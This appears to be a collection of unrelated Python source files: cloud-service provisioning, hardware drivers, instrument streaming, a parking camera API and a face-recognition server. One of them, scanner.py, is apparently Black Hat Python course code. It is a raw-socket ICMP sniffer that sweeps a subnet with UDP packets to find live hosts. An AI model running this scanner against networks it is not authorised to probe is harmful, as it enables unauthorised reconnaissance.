sqs.purge_queue(QueueUrl=redrive_queue["QueueUrl"])
def provision_bucket(s3, bucket_name: str) -> None:
s3.create_bucket(Bucket=bucket_name)
LOGGER.debug(bucket_name)
def bucket_provision_loop() -> None:
s3_succ = {bucket for bucket in buckets}
s3 = None
for i in range(0, 150):
try:
s3 = s3 or boto3.client(
"s3",
endpoint_url="http://s3:9000",
aws_access_key_id="minioadmin",
aws_secret_access_key="minioadmin",
)
except Exception as e:
if i > 10:
LOGGER.debug("failed to connect to sqs or s3", e)
continue
for bucket in buckets:
if bucket in s3_succ:
try:
provision_bucket(s3, bucket)
s3_succ.discard(bucket)
except Exception as e:
if "BucketAlreadyOwnedByYou" in str(e):
s3_succ.discard(bucket)
continue
if i > 10:
LOGGER.debug(e)
time.sleep(1)
if not s3_succ:
return
raise Exception("Failed to provision s3")
def hash_password(cleartext, salt) -> str:
hashed = sha256(cleartext).digest()
return pbkdf2_hmac("sha256", hashed, salt, 512000).hex()
def create_user(username, cleartext):
assert cleartext
dynamodb = boto3.resource(
"dynamodb",
region_name="us-west-2",
endpoint_url="http://dynamodb:8000",
aws_access_key_id="dummy_cred_aws_access_key_id",
aws_secret_access_key="dummy_cred_aws_secret_access_key",
)
table = dynamodb.Table("local-grapl-user_auth_table")
# We hash before calling 'hashed_password' because the frontend will also perform
# client side hashing
cleartext += "f1dafbdcab924862a198deaa5b6bae29aef7f2a442f841da975f1c515529d254"
cleartext += username
hashed = sha256(cleartext.encode("utf8")).hexdigest()
for i in range(0, 5000):
hashed = sha256(hashed.encode("utf8")).hexdigest()
salt = os.urandom(16)
password = hash_password(hashed.encode("utf8"), salt)
table.put_item(Item={"username": username, "salt": salt, "password": password})
def sqs_provision_loop() -> None:
sqs_succ = {service for service in services}
sqs = None
for i in range(0, 150):
try:
sqs = sqs or boto3.client(
"sqs",
region_name="us-east-1",
endpoint_url="http://sqs.us-east-1.amazonaws.com:9324",
aws_access_key_id="dummy_cred_aws_access_key_id",
aws_secret_access_key="dummy_cred_aws_secret_access_key",
)
except Exception as e:
if i > 50:
LOGGER.error("failed to connect to sqs or s3", e)
else:
LOGGER.debug("failed to connect to sqs or s3", e)
time.sleep(1)
continue
for service in services:
if service in sqs_succ:
try:
provision_sqs(sqs, service)
sqs_succ.discard(service)
except Exception as e:
if i > 10:
LOGGER.error(e)
time.sleep(1)
if not sqs_succ:
return
raise Exception("Failed to provision sqs")
if __name__ == "__main__":
time.sleep(5)
local_dg_provision_client = MasterGraphClient()
LOGGER.debug("Provisioning graph database")
for i in range(0, 150):
try:
drop_all(local_dg_provision_client)
break
except Exception as e:
time.sleep(2)
if i > 20:
LOGGER.error("Failed to drop", e)
mg_succ = False
sqs_t = threading.Thread(target=sqs_provision_loop)
s3_t = threading.Thread(target=bucket_provision_loop)
sqs_t.start()
s3_t.start()
for i in range(0, 150):
try:
if not mg_succ:
time.sleep(1)
provision_mg(
local_dg_provision_client,
)
mg_succ = True
print("Provisioned mastergraph")
break
except Exception as e:
if i > 10:
LOGGER.error("mg provision failed with: ", e)
for i in range(0, 150):
try:
client = boto3.client(
service_name="secretsmanager",
region_name="us-east-1",
endpoint_url="http://secretsmanager.us-east-1.amazonaws.com:4566",
aws_access_key_id="dummy_cred_aws_access_key_id",
aws_secret_access_key="dummy_cred_aws_secret_access_key",
)
create_secret(client)
break
except botocore.exceptions.ClientError as e:
if "ResourceExistsException" in e.__class__.__name__:
break
if i >= 50:
LOGGER.debug(e)
except Exception as e:
if i >= 50:
LOGGER.error(e)
time.sleep(1)
for i in range(0, 150):
try:
create_user("grapluser", "graplpassword")
break
except Exception as e:
if i >= 50:
LOGGER.error(e)
time.sleep(1)
sqs_t.join(timeout=300)
s3_t.join(timeout=300)
print("Completed provisioning")
|
CoinManager.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import threading
import logging
import RPi.GPIO as GPIO
class CoinManager(object):
def __init__(self, pin):
logging.info('Create CoinCounter instance')
self.cash = 0
self.last_pulse = None
self.pulses = 0
self.running = False
# Setup coin interrupt channel
GPIO.setup(pin,GPIO.IN)
GPIO.add_event_detect(pin,GPIO.FALLING,callback=self.__coinEventHandler__)
return
def get_cash(self):
return self.cash / 10.0
def reset(self):
self.cash = 0
def __coinEventHandler__(self, pin):
self.pulses += 1
self.last_pulse = time.time()
if(self.running == False):
self.running = True
self.thread = threading.Thread(target=self.__cashCollector__)
self.thread.start()
def is_processing(self):
return self.running
def __cashCollector__(self):
while self.running:
if(self.last_pulse != None and time.time() - self.last_pulse > 0.2):
logging.info('Collecting ' + str(self.pulses / 10.0) + " to total of " + str(self.cash / 10.0))
self.cash = self.cash + self.pulses
self.pulses = 0
self.last_pulse = None
self.running = False
time.sleep(0.1) |
_frame_instrument.py |
# Pull in Python 3 string object on Python 2.
import sys
import logging
import time
import threading
import zmq
from collections import deque
from queue import Queue, Empty
from . import _instrument
from . import _get_autocommit
from . import _input_instrument
from . import UncommittedSettings
from . import NotDeployedException
from . import NoDataException
from . import FrameTimeout
from ._instrument import needs_commit
from ._frame_instrument_data import InstrumentData
log = logging.getLogger(__name__)
class FrameQueue(Queue):
def put(self, item, block=True, timeout=None):
# Behaves the same way as default except that instead of raising Full,
# it just pushes the item on to the deque anyway, throwing away old
# frames.
self.not_full.acquire()
try:
if self.maxsize > 0 and block:
if timeout is None:
while self._qsize() == self.maxsize:
self.not_full.wait()
elif timeout < 0:
raise ValueError("'timeout' must be a non-negative number")
else:
endtime = Queue._time() + timeout
while self._qsize() == self.maxsize:
remaining = endtime - Queue._time()
if remaining <= 0.0:
break
self.not_full.wait(remaining)
self._put(item)
self.unfinished_tasks += 1
self.not_empty.notify()
finally:
self.not_full.release()
def get(self, block=True, timeout=None):
item = None
while True:
try:
item = Queue.get(self, block=block, timeout=timeout or 1)
except Empty:
if timeout is None:
continue
else:
raise
else:
return item
# The default _init for a Queue doesn't actually bound the deque, relying
# on the put function to bound.
def _init(self, maxsize):
self.queue = deque(maxlen=maxsize)
# Revisit: Should this be a Mixin? Are there more instrument classifications
# of this type, recording ability, for example?
class FrameBasedInstrument(_input_instrument.InputInstrument,
_instrument.MokuInstrument):
def __init__(self):
super(FrameBasedInstrument, self).__init__()
self._buflen = 1
self._queue = FrameQueue(maxsize=self._buflen)
self._hb_forced = False
self.skt, self.mon_skt = None, None
# Tracks whether the waveformid of frames received so far has wrapped
self._data_syncd = False
def _set_frame_class(self, frame_class, **frame_kwargs):
self._frame_class = frame_class
self._frame_kwargs = frame_kwargs
def _flush(self):
""" Clear the Frame Buffer.
This is normally not required as one can simply wait for the
correctly-generated frames to propagate through using the appropriate
arguments to :any:`get_data`.
"""
with self._queue.mutex:
self._queue.queue.clear()
def _set_buffer_length(self, buflen):
""" Set the internal frame buffer length."""
self._buflen = buflen
self._queue = FrameQueue(maxsize=buflen)
def _get_buffer_length(self):
""" Return the current length of the internal frame buffer
"""
return self._buflen
def set_defaults(self):
""" Set instrument default parameters"""
super(FrameBasedInstrument, self).set_defaults()
# TODO: All instruments currently run at 10Hz due to kernel timing
self.framerate = 10
def get_data(self, timeout=None, wait=True):
""" Get full-resolution data from the instrument.
This will pause the instrument and download the entire contents of
the instrument's internal memory. This may include slightly more data
than the instrument is set up to record due to rounding of some
parameters in the instrument.
All settings must be committed before you call this function. If
*pymoku.autocommit=True* (the default) then this will always be true,
otherwise you will need to have called :any:`commit` first.
The download process may take a second or so to complete. If you
require high rate data, e.g. for rendering a plot, see
`get_realtime_data`.
If the *wait* parameter is true (the default), this function will
wait for any new settings to be applied before returning. That is, if
you have set a new timebase (for example), calling this with
*wait=True* will guarantee that the data returned has this new
timebase.
Note that if instrument configuration is changed, a trigger event
must occur before data captured with that configuration set can become
available. This can take an arbitrary amount of time. For this reason
the *timeout* should be set appropriately.
:type timeout: float
:param timeout: Maximum time to wait for new data, or *None* for
indefinite.
:type wait: bool
:param wait: If *true* (default), waits for a new waveform to be
captured with the most recently-applied settings, otherwise just
return the most recently captured valid data.
:return: :any:`InstrumentData` subclass, specific to the instrument.
"""
if self._moku is None:
raise NotDeployedException()
if self.check_uncommitted_state():
raise UncommittedSettings("Detected uncommitted "
"instrument settings.")
# Stop existing logging sessions
self._stream_stop()
# Block waiting on state to propagate (if wait=True) or a trigger to
# occur (wait=False). This also gives us acquisition parameters for
# the buffer we will subsequently stream
frame = self.get_realtime_data(timeout=timeout, wait=wait)
# Wait on a synchronised frame or timeout, whichever comes first.
# XXX: Timeout is not well-handled, in that each sub-operation has its
# own timeout rather than the timeout applying to the whole function.
# This works in most circumstances but can mean that the function's
# maximum return time is several times longer than the user wanted.
start = time.time()
while not(frame.synchronised):
if timeout is not None and (time.time() > start + timeout):
raise FrameTimeout("Timed out waiting on instrument data.")
frame = self.get_realtime_data(timeout=timeout, wait=wait)
# Check if it is already paused
was_paused = self._get_pause()
# Force a pause so we can start streaming the buffer out
if not was_paused:
self._set_pause(True)
if not _get_autocommit():
self.commit()
# Get buffer data using a network stream
self._stream_start(start=0, duration=0, use_sd=False, ch1=True,
ch2=True, filetype='net')
while True:
try:
self._stream_receive_samples(timeout)
except NoDataException:
break
# Clean up data streaming threads
self._stream_stop()
# Set pause state to what it was before
if not was_paused:
self._set_pause(False)
if not _get_autocommit():
self.commit()
channel_data = self._stream_get_processed_samples()
self._stream_clear_processed_samples()
# Take the channel buffer data and put it into an 'InstrumentData'
# object
if(getattr(self, '_frame_class', None)):
buff = self._frame_class(**self._frame_kwargs)
buff.ch1 = channel_data[0]
buff.ch2 = channel_data[1]
buff.waveformid = frame.waveformid
buff._stateid = frame._stateid
buff._trigstate = frame._trigstate
# Finalise the buffer processing stage
buff.process_buffer()
return buff
else:
raise Exception("Unable to process instrument data.")
@needs_commit
def set_framerate(self, fr):
""" Set framerate """
self.framerate = fr
def get_realtime_data(self, timeout=None, wait=True):
""" Get downsampled data from the instrument with low latency.
Returns a new :any:`InstrumentData` subclass (instrument-specific),
containing a version of the data that may have been downsampled from
the original in order to be transferred quickly.
This function always returns a new object at `framerate`
(10Hz by default), whether or not there is new data in that object.
This can be verified by checking the return object's *waveformid*
parameter, which increments each time a new waveform is captured
internally.
The downsampled, low-latency nature of this data makes it
particularly suitable for plotting in real time. If you require
high-accuracy, high-resolution data for analysis, see `get_data`.
If the *wait* parameter is true (the default), this function will wait
for any new settings to be applied before returning. That is, if you
have set a new timebase (for example), calling this with *wait=True*
will guarantee that the data returned has this new timebase.
Note that if instrument configuration is changed, a trigger event must
occur before data captured with that configuration set can become
available. This can take an arbitrary amount of time. For this reason
the *timeout* should be set appropriately.
:type timeout: float
:param timeout: Maximum time to wait for new data, or *None* for
indefinite.
:type wait: bool
:param wait: If *true* (default), waits for a new waveform to be
captured with the most recently-applied settings, otherwise just
return the most recently captured valid data.
:return: :any:`InstrumentData` subclass, specific to the instrument.
"""
try:
# Dodgy hack, infinite timeout gets translated in to just an
# exceedingly long one
endtime = time.time() + (timeout or sys.maxsize)
while self._running:
frame = self._queue.get(block=True, timeout=timeout)
# Return only frames with a triggered and rendered state being
# equal (so we can interpret the data correctly using the
# entire state)
# If wait is set, only frames that have the triggered state
# equal to the currently committed state will be returned.
if (not wait and frame._trigstate == frame._stateid) or \
(frame._trigstate == self._stateid):
return frame
elif time.time() > endtime:
raise FrameTimeout()
else:
log.debug("Incorrect state received: %d/%d",
frame._trigstate, self._stateid)
except Empty:
raise FrameTimeout()
def _set_running(self, state):
prev_state = self._running
super(FrameBasedInstrument, self)._set_running(state)
if state and not prev_state:
self._fr_worker = threading.Thread(target=self._frame_worker)
self._fr_worker.start()
elif not state and prev_state:
self._fr_worker.join()
def _make_frame_socket(self):
if self.skt:
self.skt.close()
ctx = zmq.Context.instance()
self.skt = ctx.socket(zmq.SUB)
self.skt.connect("tcp://%s:27185" % self._moku._ip)
self.skt.setsockopt_string(zmq.SUBSCRIBE, u'')
self.skt.setsockopt(zmq.RCVHWM, 2)
self.skt.setsockopt(zmq.LINGER, 0)
def _frame_worker(self):
connected = False
if(getattr(self, '_frame_class', None)):
self._make_frame_socket()
fr = self._frame_class(**self._frame_kwargs)
try:
while self._running:
if self.skt in zmq.select([self.skt], [], [], 1.0)[0]:
connected = True
d = self.skt.recv()
fr.add_packet(d)
if fr._complete:
self._queue.put_nowait(fr)
fr = self._frame_class(**self._frame_kwargs)
else:
if connected:
connected = False
log.info("Frame socket reconnecting")
self._make_frame_socket()
except Exception:
log.exception("Closed Frame worker")
finally:
self.skt.close()
|
scanner.py | from bhp3_class.packets import IP, ICMP
import ipaddress
import socket
import sys
import threading
import time
SUBNET = '192.168.1.0/24'
MESSAGE = 'PYTHONRULES!'
def udp_sender():
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sender:
for ip in ipaddress.ip_network(SUBNET).hosts():
sender.sendto(bytes(MESSAGE, 'utf8'), (str(ip), 65212))
class Scanner:
def __init__(self, host):
self.host = host
self.socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
self.socket.bind((host, 0))
def sniff(self):
hosts_up = [f'{str(self.host)} *']
try:
while True:
raw_buffer = self.socket.recvfrom(65535)[0]
ip_header = IP(raw_buffer[0:20])
if ip_header.protocol == "ICMP":
offset = ip_header.ihl * 4
buf = raw_buffer[offset:offset + 8]
icmp_header = ICMP(buf)
if icmp_header.code == 3 and icmp_header.type == 3:
if ipaddress.ip_address(ip_header.src_address) in ipaddress.IPv4Network(SUBNET):
if raw_buffer[len(raw_buffer) - len(MESSAGE): ] == bytes(MESSAGE, 'utf8'):
hosts_up.append(str(ip_header.src_address))
print(f'Host Up: {str(ip_header.src_address)}')
# handle CTRL-C
except KeyboardInterrupt:
print('User interrupted.')
if hosts_up:
print(f'\n\nSummary: Hosts up on {SUBNET}')
for host in sorted(hosts_up):
print(f'{host}')
print('')
sys.exit()
if __name__ == '__main__':
if len(sys.argv) == 2:
host = sys.argv[1]
else:
host = '192.168.1.100'
s = Scanner(host)
time.sleep(1)
t = threading.Thread(target=udp_sender)
t.start()
s.sniff() |
SmartParkingAPI.py | # USAGE
# import the necessary packages
import cameraSensor
import carmotion
from imutils.video import VideoStream
from flask import Response
from flask import Flask
from flask import render_template
import time
import cv2
from livereload import Server
from gpiozero import MotionSensor
from gpiozero import LED
import time
import threading
import argparse
pir1=MotionSensor(17)# set the first motion sensor to pin 17
pir2=MotionSensor(27)# set the second motion sensor to pin 27
buzz=LED(4)#set the buzzer to zero
# initialize a flask object
app = Flask(__name__)
time.sleep(2.0);
lock = threading.Lock()
vs = VideoStream(src=0).start()
motion= carmotion.CarSensor()
cam= cameraSensor.CarCamera(lock,vs)
message= "car not parked"
#this is the first route which returns both motion detection and offers camera surveilance
@app.route('/ParkingAPI',methods=['GET'])
def full_parking():
message= motion.motion_detect(pir1,pir2,buzz)
if (message=="car parked"):
return render_template("sensorTrue.html")
else:
return render_template("sensorFalse.html")
#here is the second route which offers only motion detection to users
@app.route('/motionAPI',methods=['GET'])
def motion_parking():
message= motion.motion_detect(pir1,pir2,buzz)
if (message=="car parked"):
return render_template("motionTrue.html")
else:
return render_template("motionFalse.html")
#here is the third option which just offers camera surveilance to users
@app.route('/cameraAPI',methods=['GET'])
def camera_parking():
return render_template("camera.html")
#this route generates the video stream as required
@app.route("/video_feed")
def video_feed():
# return the response generated along with the specific media
# type (mime type)
return Response(cam.generate(),mimetype = "multipart/x-mixed-replace; boundary=frame")
if __name__ == '__main__':
t = threading.Thread(target=cam.setup_frames,)#initiates the threading for the camera
t.daemon = True
t.start()#starts the thread
ap = argparse.ArgumentParser()
#gives users the ability to add arguments for differnt ports and for a differnt IP addresss on their respective raspberry pi
ap.add_argument("-i", "--ip", type=str, required=True,
help="ip address of the device")
ap.add_argument("-o", "--port", type=int, required=True,
help="ephemeral port number of the server (1024 to 65535)")
args = vars(ap.parse_args())
app.run(host=args["ip"], port=args["port"], debug=True,
threaded=True, use_reloader=False)
# release the video stream pointer
vs.stop()
|
upload_api-v2.py | # coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os, json, time, sys, thread, base64
import argparse
import unicodedata
import shutil
import subprocess
import threading
# import dlib
import math
import time
import os.path
import Queue
from threading import Timer
import requests
from collections import defaultdict
from flask import Flask, request, url_for, make_response, abort, Response, jsonify, send_from_directory, redirect
from flask_sqlalchemy import SQLAlchemy
from migrate_db import People, TrainSet, db, AutoGroupSet, Stranger, Frame
from sqlalchemy import exc
#from flask_script import Server, Manager
#from flask_migrate import Migrate, MigrateCommand
#from werkzeug.utils import secure_filename
from uuid import uuid1
import urllib2
from urllib2 import Request, urlopen, URLError, HTTPError
from PIL import Image
#import tensorflow as tf
import numpy as np
from scipy import misc
from math import hypot
from multiprocessing import Process
from collections import OrderedDict
USE_DEFAULT_DATA=True # Enable to use "groupid_default" for SVM training
import facenet
#import clustering_people
from subprocess import Popen, PIPE
import FaceProcessing
from utilslib.mqttClient import MyMQTTClass
from utilslib.persistentUUID import getUUID
from utilslib.save2gst import save2gst, post2gst_motion, post2gst_video
from utilslib.save2gst import sendMessage2Group
from utilslib.getDeviceInfo import deviceId, get_current_groupid, get_deviceid, save_groupid_to_file, check_groupid_changed
from utilslib.qiniuUpload import qiniu_upload_img, qiniu_upload_video, qiniu_upload_data, SUFFIX
# from utilslib.make_a_gif import load_all_images, build_gif, url_to_image
# from utilslib.timer import Timer
from utilslib.clean_droped_data import clean_droped_embedding
from objects.generate_bottlenecks import resize
from faces import save_embedding
from utilslib.resultqueue import push_resultQueue, get_resultQueue
#deeepeye
from celery import Celery
from celery import Task
from billiard import current_process
from celery.signals import worker_process_init
from celery.signals import celeryd_after_setup
from celery.concurrency import asynpool
BASEDIR = os.getenv('RUNTIME_BASEDIR',os.path.abspath(os.path.dirname(__file__)))
TMP_DIR_PATH = os.path.join(BASEDIR, 'data', 'faces', 'tmp_pic_path')
UPLOAD_FOLDER = os.path.join(BASEDIR, 'image')
DATABASE = 'sqlite:///' + os.path.join(BASEDIR, 'data', 'data.sqlite')
face_tmp_objid = None
obje_tmp_objid = None
EN_OBJECT_DETECTION = False
FACE_DETECTION_WITH_DLIB = False # Disable DLIB at this time
EN_SOFTMAX = False
SOFTMAX_ONLY = False
isUpdatingDataSet = False
webShowFace = False
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif', 'bitmap'])
EXT_IMG='png'
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
# db = SQLAlchemy(app)
db.init_app(app)
ENABLE_DEBUG_LOG_TO_GROUP = False
DO_NOT_UPLOAD_IMAGE = False
DO_NOT_REPORT_TO_SERVER = False
NEAR_FRONTIAL_ONLY = False
image_size = 112
margin = 6
facenet_model = os.path.join(BASEDIR, 'facenet_models/20170512-110547/20170512-110547.pb')
minsize = 50 # minimum size of face
threshold = [0.6, 0.7, 0.7] # three steps's threshold
factor = 0.709 # scale factor
confident_value = 0.67
mineyedist = 0.3 # Eye distance of width of face bounding box
CONFIDENT_VALUE_THRESHOLD = 0.80 #点圈显示的匹配度阈值,大于这个才显示,针对数据库遍历
FOR_ARLO = True
# BLURY_THREHOLD = 10 # Blur image if less than it. Reference: http://www.pyimagesearch.com/2015/09/07/blur-detection-with-opencv/
uploadImg=None
mqttc=None
gbottlenecks=None
trainfromfottlenecks=None
gFlask_port=None
preFrameOnDevice = {}
all_face_index = 0 #每当识别出一个人脸就+1,当2个人同时出现在图片里面并且都不认识,需要区分开来
#deeepeye
asynpool.PROC_ALIVE_TIMEOUT = 60.0 #set this long enough
CLUSTER_REDIS_ADDRESS = os.getenv('CLUSTER_REDIS_ADDRESS','redis')
CLUSTER_REDIS_PORT = os.getenv('CLUSTER_REDIS_PORT','6379')
deepeye = Celery('upload_api-v2',
broker='redis://'+CLUSTER_REDIS_ADDRESS+':'+CLUSTER_REDIS_PORT+'/0',
backend='redis://'+CLUSTER_REDIS_ADDRESS+':'+CLUSTER_REDIS_PORT+'/0')
deepeye.count = 1
# run as worker only
CLUSTER_WORKERONLY = os.getenv('CLUSTER_WORKERONLY', False)
HAS_OPENCL = os.getenv('HAS_OPENCL', 'true')
SAVE_ORIGINAL_FACE = False
original_face_img_path = os.path.join(BASEDIR, 'data', 'original_face_img')
if not os.path.exists(original_face_img_path):
os.mkdir(original_face_img_path)
SVM_CLASSIFIER_ENABLED=True
SVM_SAVE_TEST_DATASET=True
SVM_TRAIN_WITHOUT_CATEGORY=True
SVM_HIGH_SCORE_WITH_DB_CHECK=True
counter = 0
if HAS_OPENCL == 'false':
from embedding_client import get_remote_embedding
def featureCalculation(imgpath):
img = misc.imread(os.path.expanduser(imgpath))
prewhitened = facenet.prewhiten(img)
embedding = FaceProcessing.FaceProcessingImageData2(img)
return embedding
def allowed_file(filename):
"""
检查文件扩展名是否合法
:param filename:
:return: 合法 为 True
"""
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
def insertOneImageIntoPeopleDB(filepath, uuid, group_id, objid, url, notFace=False, style="front"):
if notFace is True:
classId = "notface"
else:
classId = objid
if not os.path.exists(filepath):
print("file not exists %s" %(filepath))
return
embedding = featureCalculation2(filepath)
with app.app_context():
people = People(embed=embedding, uuid=uuid, group_id=group_id,
objId=objid, aliyun_url=url, classId=classId, style=style)
db.session.add(people)
db.session.commit()
os.remove(filepath)
return embedding
#For AutoGroup
#AutogroupFilesList = {}
#AutogroupDatasetFilesList = {}
AutogroupDB = None
AutogroupDatasetDB = None
isSyncAutogroupDataset = True
isStartAutogroup = False
AUTOGROUP_UNKNOWNFACES_DB = os.path.join(BASEDIR, 'autogroup_unknownfaces_db.json')
AUTOGROUP_DATASET_DB = os.path.join(BASEDIR, 'autogroup_dataset_db.json')
class MyDB:
def __init__(self, dbpath, isSave=False):
print("MyDB: __init__")
self.isSave = isSave
self.collection = {}
if (os.path.isfile(dbpath)):
with open(dbpath) as fJson:
self.collection = json.load(fJson)
self.dbpath = dbpath
def fetch(self):
return self.collection.copy()
def find(self, key, fields):
return self.collection.get(key, fields)
'''
if key is None:
return {}
if key in self.collection.keys():
if fields is None:
return self.collection[key]
subDic = self.collection[key]
isMatch = True
for subKey, subValue in fields:
if subKey not in subDic.keys() or subValue != subDic[subKey]:
isMatch = False
return {}
if isMatch is True:
return subDic
return {}
'''
def insert(self, key, fields):
self.collection[key] = fields
if self.isSave is True:
self.save()
def update(self, key, fields):
self.collection.update({key:fields})
if self.isSave is True:
self.save()
def remove(self, key):
self.collection.pop(key, "Key not Found!")
if self.isSave is True:
self.save()
def batch_insert(self, items):
print("items={}".format(items))
for key, value in items.items():
if isinstance(value,dict):
self.insert(key, value)
else:
print("batch_insert: invalid data format.")
if self.isSave is True:
self.save()
def save(self):
if self.dbpath is None:
return
with open(self.dbpath, 'w') as fJson:
json.dump(self.collection, fJson)
def AutoGroupSetInsert(obj):
print("test")
def AutoGroupSetUpdate(obj):
print("test")
def AutoGroupSetRemove(obj):
print("test")
def disposeAutoGroupFunc(type, json=None):
global AutogroupDB
global AutogroupDatasetDB
global isSyncAutogroupDataset
global isStartAutogroup
print("disposeAutoGroupFunc: type={}, json={}".format(type, json))
if AutogroupDB is None:
AutogroupDB = MyDB(AUTOGROUP_UNKNOWNFACES_DB)
if AutogroupDatasetDB is None:
AutogroupDatasetDB = MyDB(AUTOGROUP_DATASET_DB)
if type == "dataset":
AutogroupDatasetDB.batch_insert(json)
print("Download autogroup dataset...")
elif type == "syncdataset":
isSyncAutogroupDataset = True
print("Set isSyncAutogroupDataset to True")
elif type == "autogroup":
if json is not None:
AutogroupDB.batch_insert(json)
isStartAutogroup = True
print("Autogroup...")
#Path format: GroupID_FaceId/url_filename
def getFacialImagePath(img_path):
part1 = os.path.basename(os.path.dirname(img_path))
part2 = os.path.basename(img_path)
return part1+"/"+part2
def downloadAutogroupDataset(result, group_id):
failedDownloadedItems = []
for person in result:
faceId = person.get("faceId")
urls = person.get("urls")
print('--> {}'.format(faceId))
for url in urls:
#print(' {}'.format(url))
# url,faceid 从点圈群相册获取
# todo 可以用for循环解析群相册获取的json数据
img_url = url['url']
faceid = faceId
style = url['style']
if style != 'front':
#print("style=%s"%style);
continue
#status, embedding = down_img_embedding(img_url, group_id, faceid, style=style)
img_path = save_embedding.get_image_path_dst(img_url, group_id, faceId, style, "autogroup")
#print("img_path = {}".format(img_path))
embedding_path = save_embedding.get_embedding_path(img_path)
embedding = None
if not os.path.exists(img_path):
img_path = save_embedding.download_img_for_svm_dst(img_url, group_id, faceId, style, "autogroup")
if img_path:
if not os.path.exists(embedding_path):
img = misc.imread(os.path.expanduser(img_path)) # 手动裁剪后的图片需要再缩放一下
aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')
misc.imsave(img_path, aligned)
embedding = featureCalculation(img_path)
embedding_path = save_embedding.get_embedding_path(img_path)
save_embedding.create_embedding_string(embedding, embedding_path)
#print("1, type(embedding)={}".format(type(embedding)))
old_autogroup_set = AutoGroupSet.query.filter_by(url=img_url, group_id=group_id, is_or_isnot=True, style=style).first()
if not old_autogroup_set:
if embedding is None:
embedding_path = save_embedding.get_embedding_path(img_path)
embedding = save_embedding.read_embedding_string(embedding_path)
embedding = np.asarray(embedding)
print("read_embedding_string...........")
print("2, type(embedding)={}".format(type(embedding)))
unique_face_id = ''
if unique_face_id in url:
unique_face_id = url['unique_face_id']
#unique_face_id = url['unique_face_id'] if unique_face_id in url else ''
autoGroupSet = AutoGroupSet(url=img_url, group_id=group_id, is_or_isnot=True,
device_id='', face_id=faceId, unique_face_id=unique_face_id, style=style, filepath=img_path, embed=embedding)
db.session.add(autoGroupSet)
db.session.commit()
print('-> syncAutogroupDataset downloaded url {} to {}'.format(url['url'], img_path))
else:
failedDownloadedItems.append(person)
return failedDownloadedItems
def syncAutogroupDatasetFunc():
group_id = get_current_groupid()
#host="http://localhost:3000/restapi/datasync/token/" + str(group_id)
API_SERVER_ADDRESS = os.getenv('API_SERVER_ADDRESS','workaihost.tiegushi.com')
API_SERVER_PORT = os.getenv('API_SERVER_PORT','80')
host = 'http://'+API_SERVER_ADDRESS+':'+API_SERVER_PORT+'/restapi/datasync/token/' + str(group_id)
result = None
try:
response = urlopen(host, timeout=10)
except HTTPError as e:
print('HTTPError: ', e.code)
return False
except URLError as e:
print('URLError: ', e.reason)
return False
except Exception as e:
print('Error: ', e)
return False
else:
# everything is fine
if 200 == response.getcode():
result = response.readline()
#print(result)
result = json.loads(result)
failedDownloadedItems = downloadAutogroupDataset(result, group_id)
try_count = 0
while len(failedDownloadedItems) > 0:
try_count = try_count+1
print("len(failedDownloadedItems) = {}, try_count={}".format(len(failedDownloadedItems), try_count))
if try_count > 3:
print("We have tried 3 times to download the autogroup dataset.")
break
failedDownloadedItems = downloadAutogroupDataset(failedDownloadedItems, group_id)
#Remove invalid data from local DB
urlsInLocalDB = AutoGroupSet.query.filter_by(group_id=group_id, style="front").all()
urlsOnServer = dict()
for person in result:
faceId = person.get("faceId")
urls = person.get("urls")
for url in urls:
img_url = url['url']
faceid = faceId
style = url['style']
urlsOnServer[img_url] = group_id, faceId, style
print("len(urlsInLocalDB) = {}".format(len(urlsInLocalDB)))
print("len(urlsOnServer) = {}".format(len(urlsOnServer)))
#print("urlsOnServer = {}".format(urlsOnServer))
if urlsInLocalDB:
for item in urlsInLocalDB:
image_path = None
#print("item = {}, item.url={}".format(item, item.url))
if item.url not in urlsOnServer.keys():
print("{}, {}, {}, {} is not on server, delete it from local DB.".format(item.url, item.group_id, item.face_id, item.style))
if item.filepath:
image_path = item.filepath
db.session.delete(item)
db.session.commit()
if image_path and os.path.isfile(image_path):
print('Remove image from local {}'.format(image_path))
os.remove(image_path)
embedding_path = save_embedding.get_embedding_path(image_path)
if embedding_path and os.path.isfile(embedding_path):
print('Remove embedding from local {}:'.format(embedding_path))
os.remove(embedding_path)
#Remove invalid photos from local
'''
dataset = []
for path in paths.split(':'):
path_exp = os.path.expanduser(path)
classes = [path for path in os.listdir(path_exp) \
if os.path.isdir(os.path.join(path_exp, path))]
classes.sort()
nrof_classes = len(classes)
for i in range(nrof_classes):
class_name = classes[i]
facedir = os.path.join(path_exp, class_name)
image_paths = []
if os.path.isdir(facedir):
images = os.listdir(facedir)
for img in images:
dataset.append(os.path.join(facedir,img))
if len(dataset) > 0:
for image_path in dataset:
l5 = (item for item in urlsInLocalDB if item.filepath == image_path)
if not l5:
print("image_path({}) only in local.".format(image_path))
if image_path and os.path.exists(image_path):
os.remove(filepath)
embedding_path = save_embedding.get_embedding_path(image_path)
if embedding_path and os.path.isfile(embedding_path):
os.remove(embedding_path)
'''
return True
else:
print('response code != 200')
return False
#Sync train data sets
def recover_db(img_url, group_id, faceid, filepath, embedding, style='front'):
# 恢复embedding到db
uuid = get_deviceid()
p = People.query.filter_by(aliyun_url=img_url, group_id=group_id).first()
if not p:
people = People(embed=embedding, uuid=uuid, group_id=group_id,
objId=faceid, aliyun_url=img_url, classId=faceid, style=style)
db.session.add(people)
db.session.commit()
print("Add people")
#return True
#else:
#print("No need add people")
#return False
old_train_set = TrainSet.query.filter_by(url=img_url, group_id=group_id).first() # 一张图片对应的人是唯一的
if not old_train_set:
new_train_set = TrainSet(url=img_url, group_id=group_id, is_or_isnot=True,
device_id='', face_id=faceid, filepath=filepath, drop=False, style=style)
db.session.add(new_train_set)
db.session.commit()
else:
if old_train_set.filepath != filepath:
print("Update filepath in local DB")
